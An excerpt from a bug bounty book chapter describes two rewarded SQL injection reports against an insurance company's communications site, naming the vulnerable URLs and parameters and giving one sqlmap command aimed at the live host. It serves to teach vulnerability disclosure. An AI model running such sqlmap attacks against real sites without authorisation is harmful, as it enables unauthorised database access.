Bug Bounty Hunting Essentials
上QQ阅读APP看书,第一时间看更新

LocalTapiola SQL injection

  • Title: SQL injection in viestinta.lahitapiola.fi.
  • Reported by: Yasar and Anandakshya.
  • Bounty Rewarded: $1,350 and $1,560.
  • Web application URL: https://viestinta.lahitapiola.fi.
  • Description: Localtapiola is basically an insurance company that provides different kinds of life and non-life insurance policy to its customers; with its digital presence and online transaction-based system, it has one of the most active programs on Hackerone. Localtapiola had two very descriptive SQL injection reports that I decided to include in this chapter.

SQL injection by Yasar:

This was a very simple error-based SQL injection in Localtapiola, which Yasar identified. The URL where the SQL injection was found was as follows: http://viestinta.lahitapiola.fi/webApp/cancel_iltakoulu?regId=478836614&locationId=464559674.

The vulnerable parameter was regId. He simply used sqlmap to exploit the SQL injection after identifying it:

./sqlmap.py -u "http://viestinta.lahitapiola.fi/webApp/cancel_iltakoulu?regId=478836614&locationId=464559674" -p regId
  

He then obtained the desired output of the exploit code and was able to verify the SQL injection.

SQL injection by Anandakshya:

This was another SQL injection of a similar nature found by Anand. He identified the vulnerability in the email parameter and exploited it by sqlmap there on http://viestinta.lahitapiola.fi/webApp/omatalousuk?email=aaaaa.